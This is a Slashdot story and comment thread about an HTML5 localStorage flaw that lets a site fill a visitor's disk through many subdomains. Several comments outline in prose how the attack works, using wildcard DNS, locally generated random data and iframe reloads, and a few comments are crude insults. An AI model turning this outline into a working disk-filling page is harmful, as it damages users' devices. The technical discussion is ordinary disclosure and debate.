Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

HTML5 Storage Bug Can Fill Your Hard Drive

Soulskill posted about a year ago | from the disk-write-error dept.

Bug 199

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken" (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."

cancel ×

199 comments

Anonymous coward bug can fill your anus (-1)

Anonymous Coward | about a year ago | (#43035181)

You know it, I know it. All those FP's linking to the Gospel of Christmas Island know what I mean.

Slashdot, at least we're better than Reddit! You have finally been modded up from the minusworld of trolldom.

Re:Anonymous coward bug can fill your anus (1, Offtopic)

Deekin_Scalesinger (755062) | about a year ago | (#43035289)

Entirely offtopic, (and I am prepared for the karma hit) but today is my birthday!

Re:Anonymous coward bug can fill your anus (0)

Anonymous Coward | about a year ago | (#43035317)

Have a good one Deekin

So What's The Point (2, Insightful)

Anonymous Coward | about a year ago | (#43035193)

This seems like mental masturbation to me. I see no point in initiating such an "attack".

If I understand correctly, you are going to expend great effort and possibly money on tens of thousands of subdomains, transfer a lot of data and incur bandwidth charges, in order to fill someone's hard drive? This is about the lamest DoS attack I have ever heard of. And the easy fix is to simply clear cookies?

Come on, this is a non-issue looking to be a problem.

Re:So What's The Point (3, Interesting)

MicrosoftRepresentit (1002310) | about a year ago | (#43035283)

Using javorscript to generate the data quicker than most hard disks could write it, with no bandwidth usage other than fetching the script itself, so thats not a problem. But yeah, just a single gigabyte would require 200 subdomains so I'm not really seeing the danger here.

Re:So What's The Point (5, Informative)

The Mighty Buzzard (878441) | about a year ago | (#43035485)

Really? You've never admin'd a dns server then. It's trivial to have one respond to wildcard subdomain names that you could generate dynamically on page load with one line of javascript.

Re:So What's The Point (5, Informative)

arth1 (260657) | about a year ago | (#43035711)

It doesn't take much work or time to set up a wildcard CNAME entry pointing to a single web server that answers a wildcard. You now have billions of subdomains with a couple of minutes of work.
The web instance serves a short javascript which generates a boatload of data on the client side, and then calls a random subdomain to reload the js with a new domain name.

All this can be linked to a single ad (or blog comment, for vulnerable boards that allow css exploits).

Re:So What's The Point (1)

gandhi_2 (1108023) | about a year ago | (#43035391)

Imagine the network usage bill for your VPS trying to fill every hard drive of every device that visits your site.

Re:So What's The Point (4, Interesting)

thetoadwarrior (1268702) | about a year ago | (#43035731)

It's a web app, let the client generate it. You generate the free sub domains with a script or something a bit more intelligent but either way the cost should be minimal. I assume as well you wouldn't necessarily need to fill it completely. A gig or two might ruin the browser's performance.

Re:So What's The Point (4, Informative)

TheRaven64 (641858) | about a year ago | (#43036769)

You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data (math.random() will do it fine). The per-domain thing mean that you need one HTTP request per 5-10MB, but on the server that will be a wildcard DNS entry always resolving to the same server. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, and so you each HTTP request to your server (total of about 1KB of traffic) generates 5-10MB of data on the client's hard disk.

Mobile devices? (4, Insightful)

dclozier (1002772) | about a year ago | (#43035399)

Devices with smaller drives like a cell phone, tablet or laptops like Google's Pixel would be more vulnerable. Perhaps if you created some javascript that simply made requests to iterated subdomains that simply returned a small amount of javascript that then generated large amounts of text to store locally? The bandwidth needed would be much less then and the same amount of damage done. I have no idea if this scenario is possible though so take this with a grain of salt.

Re:So What's The Point (5, Insightful)

Qzukk (229616) | about a year ago | (#43035407)

Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.

much easier than you think (3, Informative)

Anonymous Coward | about a year ago | (#43035733)

, transfer a lot of data and incur bandwidth charges,

Posting anonymously since this shows how it could be done.

I don't see any need to transfer data. Simply generate random strings programatically. One could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and randomly generate values in a loop. Super easy. For the subdomain stuff, like others have said, wildcard for DNS. Then just serve the small js file that runs, then programtically generates a new random subdomain to dynamically load the js file.

The end point is that you don't need a lot of data bandwidth to screw up someone's computer.

Re:So What's The Point (0)

arth1 (260657) | about a year ago | (#43035831)

Subdomains are free. With a wildcard DNS record, you have nearly an infinite supply of them.

Pet peeve: "Nearly infinite" makes no sense, unless you mean infinite of a lower order (like infinity minus seven, which is still infinite).
The number of possible wildcard DNS records exceeds anything you might possibly need, use, or want, but it's still a finite number, and not anywhere near infinite. It's much closer to zero than it is to even a billionth of a billionth of infinite.

With a wildcard DNS record, you have as many subdomains as you need.

Re:So What's The Point (5, Insightful)

Jiro (131519) | about a year ago | (#43035951)

That's not true.

"Nearly infinite" means "it's not infinite, but it's large enough that it has most of the same practical effects as it would if it were infinite".

You seem to be interpreting the word "nearly" to mean "has a numerical value close to" rather than "has effects similar to". Obviously it is nonsensical for something to be nearly infinite using that first definition, but that should be a warning sign that you're not using the definition that people mean, not that everyone else is speaking nonsense.

Re:So What's The Point (0)

arth1 (260657) | about a year ago | (#43036827)

You seem to be interpreting the word "nearly" to mean "has a numerical value close to" rather than "has effects similar to".

I'd happily go for "has effects similar to", but it doesn't have any of the effects similar to infinity.
Divide it by a large number, and it becomes noticeably smaller. Multiply it by a large number, and it becomes noticeably bigger.
Subtract it from itself and it becomes zero instead of undefined.

What I see is a use of "infinitely" as a synonym for "extremely large". It isn't, precisely because of the effects you mentioned.

Re:So What's The Point (1)

BaronAaron (658646) | about a year ago | (#43036967)

The DNS specifications state the max length of a domain name is 253. Assuming you could get the smallest possible root domain name of 4 characters (x.cc for example) that means you would have 249 characters left.

To complicate things a little more the specifications state each label (subdomain) can't exceed 63 characters. That means 3 full subdomains of 63 characters + 1 subdomain of 56 characters if you include the periods. Grand total of 245 characters to play with.

The specifications state that the only valid characters are ASCII A-Z, a-z, 0-9, and hyphen meaning 63 potential values for each character.

63^245 = 6.894e440 possible combinations.

More then the number of atoms in the observable universe by a few factors.

Re:So What's The Point (0)

Anonymous Coward | about a year ago | (#43035475)

Sumdomains do not cost any money, any domain can have an unlimited amount of them, and DNS servers can be configured to accept wildcard hostnames, so anyone could have infinite subdomains to attack with without any more effort than routing randomstring.domain.com to the same server with an Apache mod_rewrite rule to generate random content for that subdomain.

Re:So What's The Point (1)

utkonos (2104836) | about a year ago | (#43035675)

Not sure what effort you are referring to. I can create large numbers of subdomains using a simple script to modify the zone file. Subdomains cost nothing. No effort, and no money.
Bandwidth is nearly nothing because I don't have to transfer any data to create data on the victim's drive if I use javascript.
Lastly, you're not thinking about threats holistically. This just becomes one single tool added to a group of other tools that can be employed in an advanced persistent threat attack.

Re:So What's The Point (3, Interesting)

bill_mcgonigle (4333) | about a year ago | (#43035689)

If you have a popular blog, there's no need to pay for network backup anymore - just drop enough 5MB blocks encrypted and with decent FEC to each of your readers. If you ever have a failure, just throw up a basic page with a funny cat picture and start restoring from your distributed backup.

Disable Javascript (3, Insightful)

Anonymous Coward | about a year ago | (#43035211)

Also, you're not vulnerable if you have javascript enabled.

Such is life when your browser automatically downloads and runs arbitrary untrusted software.

Re:Disable Javascript (2)

DarkRat (1302849) | about a year ago | (#43035343)

so if I disable JS, I shouldn't go to that site?

I wonder how fast I can fill my harddisk... (1, Funny)

Quazion (237706) | about a year ago | (#43035219)

This sounds like a nice weekend project, wonder how fast you can fill up a harddisk with just some javascript.

Re:I wonder how fast I can fill my harddisk... (2)

Sockatume (732728) | about a year ago | (#43035361)

Assuming 500GB free space and a 20Mbps ADSL connection, call it 2MB/s down... I make it almost three days.

I think you would notice.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035443)

Isn't HTML5 storage controlled by JS? Wouldn't it be faster to just set up a loop that locally writes garbage out to storage, rather than download everything from remote?

Re:I wonder how fast I can fill my harddisk... (4, Insightful)

claar (126368) | about a year ago | (#43035461)

You're assuming that you have to download the files. It's highly likely the data could be generated locally in JavaScript.

Re:I wonder how fast I can fill my harddisk... (1)

Sockatume (732728) | about a year ago | (#43035503)

Of course it is, ha.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035509)

No, you would generate the data on the client side.

See the example page: http://www.filldisk.com/ (plays music)

Re:I wonder how fast I can fill my harddisk... (1)

TheRaven64 (641858) | about a year ago | (#43036911)

His example filled 1GB every 16 seconds, so 500GB in about two hours. That was an SSD though - you're basically limited by your hard drive's write speed (for extra fun, you'll likely fill up the disk cache and start swapping...). You may get 100MB/s from linear writes to a spinning disk, if you're lucky, 20-30MB/s is more plausible. The data isn't fetched from the server, it's generated by the JavaScript.

Re:I wonder how fast I can fill my harddisk... (0)

Anonymous Coward | about a year ago | (#43035881)

Depends on how fast your hard drive is. You could probably fill 500GB in about an hour and a half.

Support response (2, Funny)

Anonymous Coward | about a year ago | (#43035229)

but couldn't do so for MSIE because 'the page is broken" (see http://connect.microsoft.com/IE [microsoft.com] ). Oops

FUD! We haven't recieved a complaint yet.

Yours truely,
MS support.

Re:Support response (0)

Anonymous Coward | about a year ago | (#43035251)

The link isn't even broken. It worked fine on 2 phones and my desktop. Yes, it very much is FUD.

Bug, or exploit? (0, Troll)

Sockatume (732728) | about a year ago | (#43035275)

I think the summary author gives the game away in the last sentence on this one. It's not a bug, which implies unintended behavior that can accidentally happen. It's intended behavior that can be deliberately exploited to bad effect.

Re:Bug, or exploit? (5, Informative)

DarkRat (1302849) | about a year ago | (#43035371)

no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

Re:Bug, or exploit? (-1)

Sockatume (732728) | about a year ago | (#43035531)

I'd call that a design error. The browser is behaving as it is designed to, it's just that the way it's designed to behave is wrong.

Re:Bug, or exploit? (1)

Anonymous Coward | about a year ago | (#43035555)

It's called "Not Following The SPECIFICATION".

Re:Bug, or exploit? (-1, Troll)

Sockatume (732728) | about a year ago | (#43035621)

Which is a deliberate error in design. No amount of bug fixing will correct for an error in specification.

Re:Bug, or exploit? (3, Insightful)

K. S. Kyosuke (729550) | about a year ago | (#43035771)

Except that the specification is perfectly fine, it's the implementation that does something different. Or do you claim that the HTML5 spec is wrong when it says that browsers should not allow for this DoS attack to happen? Stop being a dick and admit your mistake.

Re:Bug, or exploit? (1)

DragonWriter (970822) | about a year ago | (#43036319)

Except that the specification is perfectly fine, it's the implementation that does something different.

Well, except that if you actually read the specification, nothing raised in TFS involves doing something different than required by the specification, and, in fact, the relevant recommended-but-not-required functionality described in the specification isn't defined at all (there is no definition of "affiliated origin", and only one example given.). Its outside of the simplest naive generalization of the example given, but that interpretation (e.g., treating all subdomains of the same 2LD as "affiliated origins") would also mean everything on, e.g., ".co.uk" would share the single-origin quota belonging to "co.uk".

Except that it isn't inconsistent with the spec (1)

DragonWriter (970822) | about a year ago | (#43035991)

It's called "Not Following The SPECIFICATION".

I think you need to review the relevant portion of the specification, particularly the use of the word "should" and the reference to RFC2119 for the specific definition of "should" that is applicable when used in the specification.

Re:Except that it isn't inconsistent with the spec (0)

Anonymous Coward | about a year ago | (#43036093)

Not that you're wrong, but I did like the "so you're saying we 'should' switch to Firefox?" response in the bug post. That was a pretty snappy comeback to that point.

Re:Bug, or exploit? (1)

mjr167 (2477430) | about a year ago | (#43036187)

So it's Microsoft?

Re:Bug, or exploit? (1)

thePowerOfGrayskull (905905) | about a year ago | (#43035953)

I'd call that a design error. The browser is behaving as it is designed to, it's just that the way it's designed to behave is wrong.

Which is, in other words, a bug.

Why do people persist in believing that bugs can only happen in code?

Re:Bug, or exploit? (1)

mcgrew (92797) | about a year ago | (#43036831)

A bug is unwanted, undesigned for response. As this was designed in the equipment, it's a design flaw, not a bug.

BTW, the world's first bug was a moth caught in a computers wiring, hence its name. The first bug was indeed a hardware error, a short circuit caused by the moth.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43036841)

That's a ridiculous claim to make. By your logic, it's a design error that CPUs provide a "reset" instruction, because any privileged task could call it, and it could even allow non-privileged tasks to somehow call it.

Sometimes, in the interest of having something usable and implementable, you relax a few constraints and tell the implementor to watch out for known issues. It's not an error. It's a concession.

Read the spec: recommendation, not requirement (5, Informative)

DragonWriter (970822) | about a year ago | (#43035935)

no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

Its not a bug. While the Web Storage API Candidate Recommendation (related to, but not part, of, the HTML5 spec) both says that user agents should set a per-origin storage limit and should identify and prevent use of "origins of affiliated sites" to circumvent that limit, it doesn't specify either what constitutes an "affiliated site", and neither of those things that it says "should" be done are requirements of the specification. "Should" has a quite specific meaning in the specification (defined by reference in the spec to RFC2119 [ietf.org] ), and its not the same as "must", instead:

SHOULD This word, or the adjective "RECOMMENDED", mean that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

So, its both a recommendation rather than a requirement, and not specified clearly enough to be implemented. There are some cases where origins of the same second-level domain are meaningfully affiliated, and some times where they are not (for a clear case of the latter, consider subdomains of ".co.uk".) Its pretty clear that origins which differ only in protocol are almost always going to be affiliated by any reasonable definition (e.g., http://www.example.com/ [example.com] and https://www.example.com/ [example.com] which are different origins), but no automatic identification of origin affiliation by subdomain can be done simply without understanding of per-domain policies from the TLD down to the first level at which all subdomains are affiliated. (And this is a problem which will get worse with the planned explosion of TLDs.) W

Re:Read the spec: recommendation, not requirement (1)

Kupfernigk (1190345) | about a year ago | (#43036345)

You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

"there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones.

It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow", for instance, and then let the user decide if this is a particular circumstance.

Re:Read the spec: recommendation, not requirement (5, Informative)

DragonWriter (970822) | about a year ago | (#43036587)

You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

There is a reason why internet specifications (whether or not they are from IETF, and often whether or not they are even intended as standards-track) reference the RFC2119 definitions. "MUST" vs. "SHOULD" is an important distinction.

In this particular case, whats even more important is that the recommended functionality at issue isn't defined at all, there is just one example -- and the example doesn't fully specify the origins, so its an incomplete example -- given and no definition of the parameters of the identification of "affiliated origins". So if it was a "MUST", it would be a broken standard (since it would be impossible to assess conformance), and as it is, its impossible to say whether a particular implementation even implements the recommended functionality.

"there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones

Any particular user agent is a "particular circumstance" (it is specific software with a specific use case within the scope of all possible kinds of user agents which might implement the Web Storage API); there is no such thing as an implementation that must deal with "all circumstances".

It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow"

Its not at all hard, but that's not related to the recommendation to implement per-origin quotas, or the further recommendation to build on top of the per-origin quotas functionality to detect and limit the use of "affiliated origins" to circumvent the per origin quotas, which is what is at issue here. Per-origin allow/disallow for Web Storage use isn't even a recommendation of the specification. (Though it is explicitly permitted behavior.)

Re:Bug, or exploit? (1)

DragonWriter (970822) | about a year ago | (#43036729)

HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

There are two errors in this statement:

  • The less significant error is that the relevant spec is the Web Storage specification, not the HTML5 specification;
  • The more significant error is that while the spec recommends per-origin quotas (which most browsers have), and recommends taking measures to identify and prevent the use of affiliated origins to circumvent per-origin limits, it does not, in fact, define what constitutes "affiliated origins" for the purpose of that recommendation, it just provides one example of a set of origins (and the origins in that example are incompletely specified).

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035415)

It's not intended behavior being exploited. Did you even read the summary?

>However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no.

It's a faulty implementation of the standard, which should be considered a bug, by any means.

Re:Bug, or exploit? (2)

DragonWriter (970822) | about a year ago | (#43036059)

It's not intended behavior being exploited. Did you even read the summary?

I read the summary. The author of the summary, however, has not read the spec [w3.org] , or, if they have, has failed to understand all of the following (a) that both the use of per-origin quotas is a recommendation, not a requirement, of the spec; (2) that the use of controls to prevent the use of affiliated origins to circumvent the recommended per-origin quotas are also recommendations, not requirements, of the spec, and (3) that the spec actually doesn't define what constitutes an affiliated origin, so that even if per-origin quotas and affiliated-origin identification-and-blocking were required by the spec, it would be impossible to judge whether any particular implementation complied with the requirement.

If they understood any of those points, they wouldn't describe this as a "bug".

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035431)

So its a FEATURE that they do NOT follow the STANDARD ... ok.

No evidence spec is not being followed. (1)

DragonWriter (970822) | about a year ago | (#43036123)

So its a FEATURE that they do NOT follow the STANDARD ... ok.

The specification at issue is not a standard, its a Candidate Recommendation [w3.org] . Ikay, that's a technicality, but more importantly:
They are following it; both the per-origin quotas themselves and the controls regarding preventing use of affiliated origins to circumvent the quotas are recommendations (should), not a requirements (must), of the spec, so even if they were not implemented at all, the implementation could be following the spec completely.
Further, the spec never defines criteria for determining affiliated origins with regard to the controls preventing circumvention of per-origin limits, so the fact that it doesn't prevent the particular use of related origins that were at issue in this test doesn't mean they don't have controls of the type recommended.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035497)

Glad you are not involved in any aspect of the design and development workflow, go back to your WoW gaming wearing your "know it all" cap.

Re:Bug, or exploit? (1)

Sockatume (732728) | about a year ago | (#43035561)

I have a doctorate and spend more time bathing in a given week than on videogames.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035605)

I have a Post-Doctorate in Distributed Computational Penile Tensionology along with many papers written, queer reviewd and published in top shelf publications.

Re:Bug, or exploit? (1)

Sockatume (732728) | about a year ago | (#43035629)

Are we done here? My coffee break ends soon.

Re:Bug, or exploit? (0)

Anonymous Coward | about a year ago | (#43035693)

Not at all, I am very happy to be help you waste your time on your coffee break :)

Re:Bug, or exploit? (1)

al.caughey (1426989) | about a year ago | (#43035707)

published with a brown paper wrapper too?

Fret not, Gecko users... (-1)

Anonymous Coward | about a year ago | (#43035321)

Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

I'm sure the Firefox dev team is working hard to bring that feature to the next version of Firefox... Firefox 20 is it? Which should silently infiltrate your computers anytime you connect to the internet with Firefox either open or set as your default browser, on or after February 28th, 2013!

Wait, what day is it?

It's a feature! (3, Interesting)

sootman (158191) | about a year ago | (#43035335)

1.porn.com, 2.porn.com, 3.porn.com...

Actually, that could be handy -- you could store lots of music from song.album.artist.someMP3site.com.

Re:It's a feature! (3, Interesting)

sootman (158191) | about a year ago | (#43035543)

Come to think of it, it could lead to problems. What if you read a lot of blogs hosted on wordpress.com? Or use many apps on *.google.com?

Re:It's a feature! (2)

fatphil (181876) | about a year ago | (#43036017)

Of course, you highlight another potential DOS - in the scenario you mention, one site can reduce the quota available to another subdomain, as they share it. It's a lose-lose situation: permit DOSing the user, or permit DOSing other sites on the same 2LD.

Let's hope they understand how CCTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB. When they specified cookies, they fucked up, I dont trust them to have learnt from their mistakes and got HTML5 correct, far from it.

Re:It's a feature! (1)

DragonWriter (970822) | about a year ago | (#43036219)

Let's hope they understand how CCTLDs are organised. I don't like the idea of every site under *.co.uk sharing the same 5MB.

There's probably a reason that, contrary to the implication in TFS, the actual Web Storage Candidate Recommendation:

  • Recommends, but does not require, a per-origin quota,
  • Recommends, but does not require, user agents to take steps to identify and prevent use of "affiliated origins" to circumvent per-origin quotas,
  • Does not, in the preceding recommendation, provide a concrete definition of an "affiliated origin", leaving it up to UA implementors to determine, if they are going to follow the recommendation to identify and limit the use of "affiliated origins", how best to identify that origins are affiliated.

Opera is not vulnerable (-1)

Anonymous Coward | about a year ago | (#43035337)

Check your sources before you post.

Oh wait, this is slashdot and OP is probably a firefox supporter.

Re:Opera is not vulnerable (2)

Sockatume (732728) | about a year ago | (#43035385)

Is this a thing? People get tribal about browsers?

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035451)

Are you new to the internet? Of course they do. People have been "getting tribal" about browsers since Netscape vs. IE back in like 1995.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035469)

Yep, Firefag fanbois have to go out of their way to tell everyone they use it. Even in stories for other browsers.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43035851)

Welcome to 1997! [youtube.com]

Webkit was developed precisely because of this!

Re:Opera is not vulnerable (2)

Baloroth (2370816) | about a year ago | (#43036151)

Is this a thing? People get tribal about browsers?

Well, he could just be annoyed about the summary being blatantly wrong, since it specifically says that the bug exists in Opera when, in fact, it does not.

But yeah, people can be a bit competitive about their favorite browser. Not as bad as emacs vs. vi or anything, but it does happen a bit.

Re:Opera is not vulnerable (0)

Anonymous Coward | about a year ago | (#43036921)

Yes. Most of them have moved on to Chrome lately. You should hear the Chrome guys bash Firefox lately. Just look at the twit comments here about how this will let Firefox fill your RAM and your HDD. Even though it's completely wrong and inane. People are stupid. And not just about sports teams or religious and political affiliations.

Another annoying Chromium Bug... (1)

CajunArson (465943) | about a year ago | (#43035341)

On Linux using the pepperflash plugins, lots & lots of zombie processes get created and aren't even killed after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

Re:Another annoying Chromium Bug... (2)

The MAZZTer (911996) | about a year ago | (#43035437)

Chrome will remain running if you have apps installed that want to run in the background. There is an option in Settings to suppress this behavior. On Windows Chrome keeps a notification icon showing so you can shut down the browser and force these background apps to quit. Other platforms probably have something similar.

Chrome also keeps a process running for Cloud Print, if you have it enabled.

The 5GB is probably a badly-behaving app/extension. Check Chrome's Task Manager to figure out which one.

Re:Another annoying Chromium Bug... (1)

Anonymous Coward | about a year ago | (#43035495)

On Linux using the pepperflash plugins, lots & lots of zombie processes get created and aren't even killed after you exit the browser. When I noticed 5GB of memory usage on an empty desktop, I realized that Chromium is a pro-zombie browser.

The what plugins? Since when does anyone use PepperFlash on Chromium? Are those even included in Chromium builds, as opposed to straight-up Chrome?

Regardless, long story short, despite its other flaws, I never see this on the plain Flash plugin.

has FF fixed their memory leak? (-1)

Anonymous Coward | about a year ago | (#43035369)

I tried to like Chrome, but can't seem to get used to it.

wordpress.com? (1, Insightful)

malignant_minded (884324) | about a year ago | (#43035441)

isn't everyone's blog a subdomain?

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035569)

> isn't everyone's blog a subdomain?

There's no technical restriction to why you would use a subdomain for a certain kind of content (like a blog). So no.
This is a blog: http://www.ikeahackers.net/ [ikeahackers.net] - No subdomain. What you consider to be a blog, seems ill-defined.http://it.slashdot.org/story/13/02/28/1534259/html5-storage-bug-can-fill-your-hard-drive#

Re:wordpress.com? (2)

malignant_minded (884324) | about a year ago | (#43035635)

Let me clarify as I thought it was clear but apparently not, isn't everyone that uses wordpress.com to host a blog using a subdomain of wordpress.com? If that is true doesn't that make this standard a little difficult to follow.

Re:wordpress.com? (1)

Anonymous Coward | about a year ago | (#43035819)

I was thinking the same thing, but in a different site...what about dyndns or no-ip and their ilk as well? If Firefox has implemented things this way then how hasn't this come up as a problem with any of these kinds of sites? They've had to have some of their people see this issue.

Re:wordpress.com? (1)

Beorytis (1014777) | about a year ago | (#43036407)

It's only difficult to follow (in that particular case) if the all wordpress blogs you read have a need for local storage that exceeds the limit.

Re:wordpress.com? (1)

malignant_minded (884324) | about a year ago | (#43036577)

Its not the user that follows the standard its the browser and it's developers that determine "yeah we can do that". As many people pointed out this would have impacts on more than my example, its just the one at the tip of my tongue. I can only guess the devs looked at that and said "that breaks too much" and tossed the 'suggestion' for this standard aside. I'm sure the devs thought about more than stupid wordpress sites. I doubt they would set this up to work on some domains and not others, it's likely we follow this or we don't so the particular use case is irrelevant.

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035667)

Wow, you're a fucking moron.

Re:wordpress.com? (1)

Ziktar (196669) | about a year ago | (#43035755)

Yes, but typically wordpress blogs don't need to store local content for a fancy HTML5 app.

Re:wordpress.com? (0)

Anonymous Coward | about a year ago | (#43035963)

what about co.uk then?

Re:wordpress.com? (1)

91degrees (207121) | about a year ago | (#43036001)

There are quite a few largely independent third and even fourth level domains. International URLs for example often have something like com.au or .co.uk. Then there are ISPs in those countries. It's less common now but there are still a few username.demon.co.uk accounts kicking about.

Firefox... (0)

Anonymous Coward | about a year ago | (#43035903)

Firefox is only safe from the exploit because it'll max out your RAM and crash well before it has chance to fill your hard disk.

It does this normally, without even trying.

Editing (1)

guttentag (313541) | about a year ago | (#43035995)

A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE.

OK, so we're talking about Google, Apple, Opera and Microsoft. But then...

The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer.

Now we're talking about Google, Mozilla, Opera and Microsoft. Where did Mozilla come from, and where did Apple go?

Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Firefox's implementation of HTML5 local storage is not vulnerable to this exploit.

Now we're talking about Google, Apple, Microsoft and Mozilla. Apple's back, and Opera is left out this time, and even though the author seemed to be indicating that Mozilla's browser was on the vulnerable list, now it's set apart.

Editors, if a summary is inconsistent, please clean it up or don't promote the story.

Re:Editing (1)

Beorytis (1014777) | about a year ago | (#43036463)

Where did Mozilla come from, and where did Apple go?

The first part was talking about bugs; the second was talking about storage limits. Mozilla has no bug but does have a storage limit. Apple presumably has the bug, but we don't know what its storage limit is.

Re:Editing (1)

ledow (319597) | about a year ago | (#43036563)

And Opera loses mention later on entirely. Probably because the bug doesn't exist on the last few Opera stable versions at all:

http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

HTML5 Browsers? (0)

Anonymous Coward | about a year ago | (#43036099)

I use Internet Explorer, you insensitive clod!

Distributed storage? (1)

tippe (1136385) | about a year ago | (#43036133)

I wonder if one could create some sort form of useless distributed storage using this. Basically get your web app use this 5MB of free space on each computer that visits you as a the storage media for a filesystem. It would be atrociously slow (access time for a particular block could be hours, days, weeks or longer) unreliable (non-repeat visitors or visitors that clear their cache represent data loss) and difficult to expand (to grow your storage you'd have to convince more people to visit your site), but if you were really bored and had nothing else to do, it could be an interesting project.

It sort of reminds me of hack/proof-of-concept “storage” method somebody once told me was possible using “ping”. Basically ping a host with an ICMP ping packet having the data you want to store in the "payload"; the destination host will apparently send this payload back to you in the ICMP response. Apparently, if you ignore (don't ACK) the response, the destination host will continuously try to resend the packet back to you, effectively storing your data "in the network". When you want to retrieve the data, ACK the response...

Re:Distributed storage? (0)

Anonymous Coward | about a year ago | (#43036411)

Just what I was thinking -- set up something like Dropbox, but without all the costs of servers... With enough copies on unsuspecting hosts, it might even be fast. Unethical sure, but would this be illegal?

Awesome for FireFox! (0)

EmagGeek (574360) | about a year ago | (#43036145)

Now, not only will FireFox slowly eat up gigabytes of RAM, but it'll also silently and slowly fill your entire hard disk!

I was wondering when the leaking-storage feature would mutate from RAM to disk.

Re:Awesome for FireFox! (0)

Anonymous Coward | about a year ago | (#43036423)

Didn't even RTFS - FireFox is /not/ vulnerable to this.

-Posted from 417MB of FireFox.

Re:Awesome for FireFox! (2)

gman003 (1693318) | about a year ago | (#43036487)

Erm, you got it backwards. Firefox implements the standard properly, and is thus not vulnerable to disc-filling attacks of this sort. It's every other browser that is vulnerable.

Re:Awesome for FireFox! (1)

DragonWriter (970822) | about a year ago | (#43036663)

Erm, you got it backwards. Firefox implements the standard properly

Since the actual behavior of the recommended-but-not-required functionality to identify "affiliated" origins and prevent their use to circumvent the likewise recommended-but-not-required per-origin quotas is not actually specified in the Web Storage specification (particularly, the criteria for defining affiliated origins are never specified, all that is provided is one example of a set of incompletely-specified origins as an example of affiliated origins), it is inaccurate:

  • To say that a browser which does not implement any functionality in this regard does not implement the standard "properly", or
  • To even say based on any particular test that a browser does or does not implement the recommended behavior.

Disk quotas (1)

Anonymous Coward | about a year ago | (#43036303)

This is why I have disk quotas enabled on my personal machine, even though I'm the only user. I don't want a rogue process user my UID using up those last few GB that the system will eventually need.

Opera? (2)

ledow (319597) | about a year ago | (#43036359)

I call crap on the Opera thing.

Latest stable Opera browser here, 12.14, updated 5th February:

http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

No mention of this in the 12.14 release notes (even as a "vulnerability with details to follow later", which is common practice for Opera changelogs), and silence on the article about exactly how/why/where Opera is vulnerable.

If something pops up a million times and asks you for a Gigabyte and you click yes, then that's perfectly accepted user permission to do so.

You inse8sitive clod! (-1)

Anonymous Coward | about a year ago | (#43036751)

the 7acts and
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
